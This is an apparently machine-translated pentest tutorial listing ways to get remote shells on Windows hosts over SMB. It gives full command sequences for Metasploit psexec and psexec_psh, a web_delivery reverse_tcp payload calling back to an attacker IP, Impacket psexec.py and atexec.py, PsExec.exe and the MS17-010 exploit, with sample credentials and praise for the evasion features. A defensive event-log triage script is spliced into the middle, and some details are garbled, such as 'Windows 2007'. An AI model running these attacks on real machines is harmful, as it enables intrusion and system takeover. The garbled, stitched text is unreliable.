What are the ways to remotely connect to a PC using the SMB port

2025-01-16 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/02 Report--

This article mainly shows "what are the ways to connect to a PC remotely using the SMB port". The content is simple and clear, and I hope it helps you resolve your doubts. Let me lead you through "what are the ways to remotely connect to a PC using the SMB port".

Test setup

Target host: Windows Server 2008 R2

Attacking machine: Kali Linux

Microsoft Windows authenticated user code execution

This module executes an arbitrary payload using a valid administrator username and password (or password hash). It is very similar to the "psexec" utility provided by SysInternals, and it now automatically cleans up its traces once the attack completes. The service created by this module uses a randomly chosen name and a random description.

msf > use exploit/windows/smb/psexec

msf exploit(windows/smb/psexec) > set rhost 192.168.1.104

msf exploit(windows/smb/psexec) > set smbuser administrator

msf exploit(windows/smb/psexec) > set smbpass Ignite@123

msf exploit(windows/smb/psexec) > exploit

Note:

rhost -> IP address of the target PC

smbuser -> username

smbpass -> password

After running the above commands, you get a meterpreter session on the target PC, from which you can access the resources of the target system.

Microsoft Windows authenticated PowerShell command execution

This module uses a valid administrator username and password to execute a PowerShell payload, with a technique similar to the one used by "psexec". The payload is base64 encoded and is run from the command line with the -EncodedCommand option. This method never writes the payload to the disk of the target device, and each generated payload is unique, which makes it less likely to be caught by signature-based detection. To achieve persistence, the module also offers a persistence option that keeps re-executing the payload in a while loop. Analysis also shows that the PSH implementation adds delay and obfuscation techniques to evade detection. To avoid an interactive process notification popping up (which could make users suspicious), the psh payload is greatly reduced in size and wrapped in a PowerShell invocation whose window is completely hidden.

msf > use exploit/windows/smb/psexec_psh

msf exploit(windows/smb/psexec_psh) > set rhost 192.168.1.104

msf exploit(windows/smb/psexec_psh) > set smbuser administrator

msf exploit(windows/smb/psexec_psh) > set smbpass Ignite@123

msf exploit(windows/smb/psexec_psh) > exploit

After running the above commands, you get a meterpreter session on the target PC, and then...
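The two modules above leave a characteristic trace on the target: a Windows System event 7045 ("a service was installed") whose service name is random and, for the PowerShell variant, whose binary path starts PowerShell through %COMSPEC% with a base64, UTF-16LE -EncodedCommand script. The following triage script is an added example written for this article (not code from Metasploit or the original post) that runs a few such heuristics over constructed 7045 records, as a defender reviewing service-installation logs would; the record layout, the sample service names and the encoded script are all constructed here.

```python
import base64
import re

# Constructed sample records (not real logs), shaped like a SIEM export of
# Windows System event 7045 ("A service was installed in the system").
ENCODED_LOOP = base64.b64encode(
    "while($true){Start-Sleep 5}".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "hQzKdLmPaRtW",
     "ImagePath": r"%SystemRoot%\hQzKdLmPaRtW.exe"},
    {"EventID": 7045, "ServiceName": "YmDKrcNoPq",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e "
                  + ENCODED_LOOP},
    {"EventID": 7045, "ServiceName": "Backup Agent",
     "ImagePath": r'"C:\Program Files\Backup\agent.exe"'},
]
# PowerShell accepts -e, -ec, -enc or -EncodedCommand for a base64 UTF-16LE script.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(image_path):
    """Return the decoded -EncodedCommand script, or None if the flag is absent."""
    m = ENC_FLAG.search(image_path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def looks_random(name):
    """Heuristic for the random, mixed-case alphabetic names psexec gives its service."""
    if not re.fullmatch(r"[A-Za-z]{8,16}", name):
        return False
    return any(c.isupper() for c in name[1:]) and any(c.islower() for c in name)

def triage(event):
    """Return findings for one 7045 record; an empty list means nothing suspicious."""
    findings = []
    if event.get("EventID") != 7045:
        return findings
    name, path = event["ServiceName"], event["ImagePath"]
    if looks_random(name) and name in path:
        findings.append("random service name reused as binary name (psexec-style)")
    if "%COMSPEC%" in path.upper() and "powershell" in path.lower():
        findings.append("service launches PowerShell through cmd (psexec_psh-style)")
    decoded = decode_encoded_command(path)
    if decoded is not None:
        findings.append("decoded command: " + decoded)
    return findings
```

The name heuristic is deliberately loose and will flag some legitimate vendor services, so treat a hit as a triage lead to be checked against the service binary and the account that installed it.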

Microsoft Windows Certified Manager Utility

This module uses a valid administrator username and password to execute arbitrary commands on one or more hosts. It is very useful because it does not need to upload any code to the target host. So, in a recent Metasploit framework, we can use the web_delivery module to obtain the malicious dll code and then achieve arbitrary command execution on the target host.

msf > use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set target 3

msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) > set lhost 192.168.1.106

msf exploit(multi/script/web_delivery) > exploit

Copy the boxed code in the image above; this is our malicious dll code.

msf > use auxiliary/admin/smb/psexec_command

msf auxiliary(admin/smb/psexec_command) > set rhosts 192.168.1.104

msf auxiliary(admin/smb/psexec_command) > set smbuser administrator

msf auxiliary(admin/smb/psexec_command) > set smbpass Ignite@123

msf auxiliary(admin/smb/psexec_command) > set COMMAND [Paste the dll code copied above here]

msf auxiliary(admin/smb/psexec_command) > exploit

Once the psexec_command auxiliary module has run, we get a meterpreter session with administrator privileges.

SMB Impacket WMI Exec

This module is used in a similar way to psexec, but it performs the command execution through WMI.

msf > use auxiliary/scanner/smb/impacket/wmiexec

msf auxiliary(scanner/smb/impacket/wmiexec) > set rhosts 192.168.1.104

msf auxiliary(scanner/smb/impacket/wmiexec) > set smbuser administrator

msf auxiliary(scanner/smb/impacket/wmiexec) > set smbpass Ignite@123

msf auxiliary(scanner/smb/impacket/wmiexec) > set COMMAND systeminfo

msf auxiliary(scanner/smb/impacket/wmiexec) > exploit

Impacket psexec.py

psexec.py can start processes, copy files, handle process output and return stream data on remote Windows systems. It runs shell commands remotely in a fully interactive command console without installing any client software. First we need to install the Impacket tool from GitHub: clone the git repository, install Impacket, and then run psexec.py to establish a connection to the target host.

git clone https://github.com/CoreSecurity/impacket.git

cd impacket/

python setup.py install

cd examples

Syntax:

./psexec.py [[domain/]username[:password]@]<Target IP Address>

Impacket atexec.py

This example script executes a command on the target host through the Task Scheduler service and returns the command's output.

./atexec.py SERVER/Administrator:Ignite123@192.168.1.104 systeminfo

Syntax:

./atexec.py [[domain/]username[:password]@]<Target IP Address> <Command>

As the following figure shows, the remote connection to the server is established, the command systeminfo is executed on the target server, and its output is returned directly to the terminal window on Kali.

PsExec.exe

The PsExec.exe utility helps us reach other hosts in the target network and obtains a shell on the remote PC in an automated way.

PsExec.exe download address: [click me to download]

After downloading, extract the archive and enter the following command in a command prompt window:

PsExec.exe \\192.168.1.104 -u administrator -p Ignite@123 cmd

Note:

192.168.1.104 -> IP address of the remote host

-u -> specify the user name

-p -> specify the password

cmd -> the command to run

MS17-010 EternalRomance SMB remote code execution

Test target: Windows 2007 Ultimate Edition

Attacking machine: Kali Linux

This module exploits the MS17-010 SMB vulnerabilities to obtain an arbitrary write, then overwrites the connection information of the target session so that it is converted into an administrator session.

msf > use exploit/windows/smb/ms17_010_psexec

msf exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.1.105

msf exploit(windows/smb/ms17_010_psexec) > set smbuser raj

msf exploit(windows/smb/ms17_010_psexec) > set smbpass 123

msf exploit(windows/smb/ms17_010_psexec) > exploit

That is all the content of this article, "What are the ways to remotely connect to a PC using the SMB port?" Thank you for reading! I believe you now have a certain understanding of the topic, and I hope the shared content helps you. If you want to learn more, you are welcome to follow the industry information channel!
